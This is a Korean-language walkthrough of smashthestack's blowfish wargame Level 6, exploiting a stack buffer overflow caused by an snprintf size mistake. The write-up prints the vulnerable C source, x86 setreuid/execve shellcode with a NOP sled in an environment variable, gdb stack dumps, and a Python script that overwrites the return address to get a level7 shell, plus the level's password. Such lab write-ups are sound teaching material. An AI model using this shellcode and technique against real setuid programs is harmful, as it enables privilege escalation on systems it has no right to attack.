blowfish.smashthestack.org – Level6 풀이

문제 코드는 아래와 같다.

#include <stdio.h>
#include <string.h>

int badfunc(char *string1, char *string2) {

 char buffer1[1024];
 char buffer2[1024];

 if(strlen(string1)>=sizeof(buffer1)) {
 printf(\n\t(!) overflow detected.\n);
 printf(\t(-) exiting...\n\n);
 return -1;
 }
 else {
 printf(\n\t(+) copying string1 into the buffer...);
 snprintf(buffer1,sizeof(buffer1),%s,string1);
 printf(\t\t[done] (%d)\n, strlen(buffer1));
 }

 if(strlen(string2)>=sizeof(buffer2)*3) {
 printf(\n\t(!) overflow detected.\n);
 printf(\t(-) exiting...\n\n);
 return -1;
 }
 else {
 printf(\t(+) copying string2 into the buffer...);
 snprintf(buffer2,sizeof(buffer1)*3,%s,string2);
 printf(\t\t[done] (%d)\n\n, strlen(buffer2));
 }

 return 0;
}

int main(int argc, char *argv[]) {

 if(argc != 3)
 return -1;

 badfunc(argv[2], argv[1]);

 return 0;
}

코드를 보면 사이즈를 체크하여 오버플로우를 탐지한다. 하지만 아래 인자를 변수에 복사할때 3배를 크기 만큼 넣도록 구성되어 있다. 해당 부분에서 오버플로우가 나타남을 알 수 있다.

그럼 공격을 해보도록 하자. 우선 NOP와 Shellcode를 환경변수에 등록을 한 후 주소를 확인하도록 하자.

level6@blowfish:/tmp/byjjoon$ export SHELLCODE=`python -c print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'`
level6@blowfish:/tmp/byjjoon$ gdb /levels/level6
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type show copying
and show warranty for details.
This GDB was configured as i486-linux-gnu...
(gdb) b main
Breakpoint 1 at 0x8048522
(gdb) r
Starting program: /levels/level6 

Breakpoint 1, 0x08048522 in main ()
(gdb) x/32wx $esp
0xbfffd7f0: 0x009ce250 0x08048330 0xbfffd808 0x00cebff4
0xbfffd800: 0x08048570 0x08048330 0xbfffd868 0x00bc8455
0xbfffd810: 0x00000001 0xbfffd894 0xbfffd89c 0x00a48088
0xbfffd820: 0x00000001 0x00000001 0x00000000 0x08048242
0xbfffd830: 0x00cebff4 0x08048570 0x08048330 0xbfffd868
0xbfffd840: 0xebb02081 0x6d0835ff 0x00000000 0x00000000
0xbfffd850: 0x00000000 0x009d32e0 0x00bc837d 0x009daff4
0xbfffd860: 0x00000001 0x08048330 0x00000000 0x08048351
(gdb) 
0xbfffd870: 0x0804851c 0x00000001 0xbfffd894 0x08048570
0xbfffd880: 0x080485d0 0x009ce250 0xbfffd88c 0x009d8ae5
0xbfffd890: 0x00000001 0xbfffd98e 0x00000000 0xbfffd99d
0xbfffd8a0: 0xbfffda2a 0xbfffda3a 0xbfffda45 0xbfffda67
0xbfffd8b0: 0xbfffda7a 0xbfffda86 0xbfffdeaf 0xbfffdebb
0xbfffd8c0: 0xbfffdee8 0xbfffdefe 0xbfffdf0d 0xbfffdf1e
0xbfffd8d0: 0xbfffdf2f 0xbfffdf38 0xbfffdf4f 0xbfffdf61
0xbfffd8e0: 0xbfffdf69 0xbfffdf78 0xbfffdfab 0xbfffdfcb
(gdb) 
0xbfffd8f0: 0x00000000 0x00000010 0xbfebfbff 0x00000006
0xbfffd900: 0x00001000 0x00000011 0x00000064 0x00000003
0xbfffd910: 0x08048034 0x00000004 0x00000020 0x00000005
0xbfffd920: 0x00000007 0x00000007 0x009c0000 0x00000008
0xbfffd930: 0x00000000 0x00000009 0x08048330 0x0000000b
0xbfffd940: 0x000003f0 0x0000000c 0x000003f0 0x0000000d
0xbfffd950: 0x000003f0 0x0000000e 0x000003f0 0x00000017
0xbfffd960: 0x00000000 0x0000000f 0xbfffd97b 0x00000000
(gdb) 
0xbfffd970: 0x00000000 0x00000000 0x69000000 0x00363836
0xbfffd980: 0x00000000 0x00000000 0x00000000 0x6c2f0000
0xbfffd990: 0x6c657665 0x656c2f73 0x366c6576 0x45485300
0xbfffd9a0: 0x4f434c4c 0x903d4544 0x90909090 0x90909090
0xbfffd9b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffd9c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffd9d0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffd9e0: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) 
0xbfffd9f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffda00: 0x90909090 0x90909090 0x6a909090 0xdb315817
0xbfffda10: 0x0b6a80cd 0x68529958 0x68732f2f 0x69622f68
0xbfffda20: 0x52e3896e 0xcde18953 0x48530080 0x3d4c4c45
0xbfffda30: 0x6e69622f 0x7361622f 0x45540068 0x6c3d4d52
0xbfffda40: 0x78756e69 0x48535300 0x494c435f 0x3d544e45
0xbfffda50: 0x2e313132 0x2e383132 0x312e3631 0x38203337
0xbfffda60: 0x20323937 0x53003232 0x545f4853 0x2f3d5954
(gdb) 
0xbfffda70: 0x2f766564 0x2f737470 0x53550031 0x6c3d5245
0xbfffda80: 0x6c657665 0x534c0036 0x4c4f435f 0x3d53524f
0xbfffda90: 0x303d6f6e 0x69663a30 0x3a30303d 0x303d6964
0xbfffdaa0: 0x34333b31 0x3d6e6c3a 0x333b3130 0x69703a36
0xbfffdab0: 0x3b30343d 0x733a3333 0x31303d6f 0x3a35333b
0xbfffdac0: 0x303d6f64 0x35333b31 0x3d64623a 0x333b3034
0xbfffdad0: 0x31303b33 0x3d64633a 0x333b3034 0x31303b33
0xbfffdae0: 0x3d726f3a 0x333b3034 0x31303b31 0x3d75733a

NOP가 나오는 위치를 적당히 잡아서 주소로 사용하자. 잡은 주소는 0xbfffd9d0 이다.
이제 공격 코드를 작성하여 공격해 보도록 하자.

level6@blowfish:/tmp/byjjoon$ cat level6.py 
#!/usr/bin/python
import os

ret = '\xd0\xd9\xff\xbf' # 0xbfffd9d0
a = ret * 600
b = 'b' * 1

os.system('/levels/level6 ' + a + ' ' + b)
level6@blowfish:/tmp/byjjoon$ ./level6.py 

 (+) copying string1 into the buffer... [done] (1)
 (+) copying string2 into the buffer... [done] (2400)

sh-3.2$ id
uid=1008(level6) gid=1008(level6) euid=1009(level7) groups=1008(level6)
sh-3.2$ cat /pass/level7
g00d_j0b
sh-3.2$